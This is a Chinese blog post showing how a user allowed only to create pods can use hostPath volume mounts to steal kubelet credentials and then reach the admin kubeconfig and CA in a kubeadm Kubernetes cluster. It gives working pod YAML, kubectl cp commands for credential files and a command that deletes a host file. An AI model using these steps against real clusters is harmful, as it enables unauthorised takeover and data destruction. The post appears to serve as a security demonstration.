Skip to main content

Command Palette

Search for a command to run...

加载卷戏法:从 Nobody 到 Terminator

Updated
3 min read

假设有一个 kubeadm 创建的集群上有这样一个用户,它只有一点点权限:在 default 命名空间新建一个 Pod,它能掀起多大风浪呢?

创建这个用户

有个创建用户的小脚本,我们可以创建一个小白用户:

$ ./add-k8s-user.sh nobody
Generating RSA private key, 4096 bit long modulus
....
Now you can try: kubectl get nodes --kubeconfig=kubeconfig-nobody

这个命令会新建一个用户,并生成对应的 kubeconfig 文件,使用这个配置文件执行各种命令,会发现因为 RBAC 的限制,什么都做不了:

$ KUBECONFIG=./kubeconfig-nobody kubectl get pods
Error from server (Forbidden): pods is forbidden: User "nobody" cannot list resource "pods" in API group "" in the namespace "default"
$ KUBECONFIG=./kubeconfig-nobody kubectl get nodes
Error from server (Forbidden): nodes is forbidden: User "nobody" cannot list resource "nodes" in API group "" at the cluster scope
...

为了完成基本的工作,我们通常会分配 Pod 的相关权限给这个用户:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: pod-owner
rules:
- apiGroups:
    - '*'
  resources:
  - pods
  - pods/*
  verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: pod-owner
  namespace: default
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: pod-owner
subjects:
- kind: User
  name: nobody

第一个 Pod

我们创建一个 Pod,很老实,只有一个加载卷有点奇怪:

apiVersion: v1
kind: Pod
metadata:
  labels:
    run: nobody
  name: nobody
spec:
  containers:
  - image: dustise/sleep
    name: sleep
    volumeMounts:
    - mountPath: "/host-etc"
      name: host-etc
  volumes:
  - name: host-etc
    hostPath:
      path: /etc

试试看这个用户:

$ export KUBECONFIG=kubeconfig-nobody
$ kubectl apply -f pod.yaml
pod/nobody created
$  kubectl get nodes,cm,svc,deploy
Error from server (Forbidden): nodes is forbidden: User "nobody" cannot list resource "nodes" in API group "" at the cluster scope
Error from server (Forbidden): configmaps is forbidden: User "nobody" cannot list resource "configmaps" in API group "" in the namespace "default"
Error from server (Forbidden): services is forbidden: User "nobody" cannot list resource "services" in API group "" in the namespace "default"
Error from server (Forbidden): deployments.apps is forbidden: User "nobody" cannot list resource "deployments" in API group "apps" in the namespace "default"

我们虽然成功创建了 Pod,其它什么都看不到,但是 etc 里面的东西可就多了,例如:

$ kubectl cp nobody:/host-etc/kubernetes/kubelet.conf kubelet.conf
tar: removing leading '/' from member names

Kubelet 的身份很明显是比 Nobody 好用的。

$ kubectl get nodes --kubeconfig=kubelet.conf
Error in configuration:
* unable to read client-cert /var/lib/kubelet/pki/kubelet-client-current.pem for default-auth due to open /var/lib/kubelet/pki/kubelet-client-current.pem: no such file or directory

缺文件不怕:

$ kubectl cp nobody:/var-lib/kubelet/pki/kubelet-client-current.pem .
warning: skipping symlink: "." -> "/var/lib/kubelet/pki/kubelet-client-2020-05-24-14-40-17.pem" (consider using "kubectl e
xec -n "" "nobody" -- tar cf - "/var-lib/kubelet/pki/kubelet-client-current.pem" | tar xf -")
tar: removing leading '/' from member names
$ kubectl cp nobody:/var-lib/kubelet/pki/kubelet-client-2020-05-24-14-40-17.pem ./kubelet-client

然后编辑 kubelet.conf,引用相关证书文件,就能得到更高权限了,用新的权限折腾一下 Node:

$ kubectl get nodes --kubeconfig=kubelet.conf
NAME   STATUS   ROLES    AGE   VERSION
kub1   Ready    master   8d    v1.17.4
kub2   Ready    <none>   8d    v1.17.4

$ kubectl label nodes kub1 master=true  --kubeconfig=kubelet.conf
node/kub1 labeled

或者删除一下主机文件 kubectl exec nobody -- rm /host-/etc/debian_version

能看到以前看不到的 Service 对象:

$ kubectl get svc
Error from server (Forbidden): services is forbidden: User "nobody" cannot list resource "services" in API group "" in the namespace "default"
$ kubectl get svc --kubeconfig=kubelet.conf
NAME         TYPE        CLUSTER-IP   EXTERNAL-IP   PORT(S)   AGE
kubernetes   ClusterIP   10.96.0.1    <none>        443/TCP   8d
$ kubectl get svc --kubeconfig=kubelet.conf -n kube-system
NAME       TYPE        CLUSTER-IP   EXTERNAL-IP   PORT(S)                  AGE
kube-dns   ClusterIP   10.96.0.10   <none>        53/UDP,53/TCP,9153/TCP   8d

更近一步

Kubelet 证书还是没有权限搞定 RBAC 的:

$ kubectl get role --kubeconfig=kubelet.conf
Error from server (Forbidden): roles.rbac.authorization.k8s.io is forbidden: User "system:node:kub2" cannot list resource "roles" in API group "rbac.authorization.k8s.io" in the namespace "default"

但是我们都会记得,Kubeadm 安装后,Master 节点的 /etc/kubernetes/admin.conf 的功能,和上面一样,用 Pod 加载它:

apiVersion: v1
kind: Pod
metadata:
  labels:
    run: nobody
  name: master
spec:
  containers:
  - image: dustise/sleep
    name: sleep
    volumeMounts:
    - mountPath: "/host-etc"
      name: host-etc
    - mountPath: "/var-lib"
      name: host-lib
  volumes:
  - name: host-etc
    hostPath:
      path: /etc
  - name: host-lib
    hostPath:
      path: /var/lib
  tolerations:
  - effect: NoSchedule
    operator: Exists
  - key: CriticalAddonsOnly
    operator: Exists
  - effect: NoExecute
    operator: Exists
  nodeSelector:
    master: "true"

这里我们使用前面的标签,把 Pod 调度到控制节点,如此一来,我们会在 /etc/kubernetes 下看到 Kubernetes 的 CA、运行配置,以及管理员的 kubeconfig 等,可以说是彻底拿到了该集群的控制权。

相关链接

  • 创建用户的脚本:https://gist.github.com/fleeto/1e37fbe572b2b77fbc7894ebcac14e8d

More from this blog

龙虾恐慌:AIOps 又要改名了?

ChatGPT 开始,把 AI 拉近到普罗大众的面前,让无数人感受到 AI 的亲民魅力。而龙虾,则把大模型驱动的自动化能力,突然间变得水灵灵、活泼泼地走进千家万户。它不只是“风口上的猪”,而是风口本身。热度高到让 Mac mini 一度断货,不知道这在不在库克的预料之内。 每代人都有每代人的鸡蛋,春节期间,我就领了我的鸡蛋。翻出古老的 MacBook Air M1,充值各种大模型。当然了,这个工具

Mar 9, 20261 min read

再见 2025

我猜不少人以为这个号废了吧?并没有,只是今年变化有点大,一直有种抄起键盘,无从说起的感觉,所以一直偷懒到今天,2025 的最后一天。 今年是我的第四个本命年,去年末一期播客里,大内说本命年不是灾年,是变化年,有危也有机。可是讲真啊,只看到危,没看到机。 各种因缘际会,从鹅厂跳槽到前东家,已经接近四年,第一个合同期已经进入尾声。除了前两年还在云原生领域嗷嗷叫,后两年基本都是些鸡零狗碎的东西了,用老东家的术语说是——偏离主航道,可谓是前景暗淡了。 一旦确定要滚蛋,反倒心思轻松起来,每天骑着我的小红车...

Jan 5, 20261 min read

辅助编程?dora 说:我知道你很急可是请你别急

从 OpenGPT 把大模型的火烧旺了之后,这三年来,相信很多组织或摩拳擦掌、或躬身入局,希望借助聪明能干的大模型,或想偿还技术宅,或想降本增效,或想弯道超车。一时间,沉寂许久的 AIxx 又活过来了,LLM Ops、Vibe Coding、中医大模型、GPT 算命等等,全都老树发新芽,焕发了勃勃生机。那么视角拉回从业者最关注的饭碗相关的领域之一——AI 辅助开发,产生了什么触动,应该如何拥抱呢? DORA 的年度报告中给出了很有意思的结论——强者恒强。 执行摘要部分总结了几个有趣的点: 问题...

Oct 6, 20251 min read

[译]dora:ai 辅助软件开发状态报告

执行摘要 在 2025 年,科技领导者面临的核心问题已不再是“是否要采用 AI”,而是“如何实现其价值”。 DORA 的研究基于超过 100 小时的定性访谈和来自全球近 5,000 名技术专业人士的问卷调查。研究揭示了一个关键事实:AI 在软件开发中的主要角色是“放大器”。它会放大高效能组织的优势,也会凸显组织的缺陷。 关键结论:AI 是放大器 AI 投资的最大回报并非来自工具本身,而是来自组织底层系统的战略性建设: 高质量的内部平台 清晰的工作流 团队的协同能力 缺少这些基础,AI ...

Oct 2, 202514 min read

僭越了,有人在用 Rust 写 Kubernetes

一个新语言问世,最爱做的事情之一,就是重写存量软件了。 云原生喝酒 SIG 重点扶持项目——rk8s(https://github.com/rk8s-dev/rk8s) 也可以归在这个范畴里,只不过这个项目重写的东西比较大,是 Kubernetes。 从 2025 年 1 月第一个 Commit 开始,到现在有了 200 多次 Commit,十几万行代码。当然距离 Kubernetes 的几百万行代码还差得远——老马就是喜欢整这种大无畏项目。 另外该项目也是国内第一个脱离 Cargo 转向使用 ...

Sep 27, 20253 min read

【伪】架构师

342 posts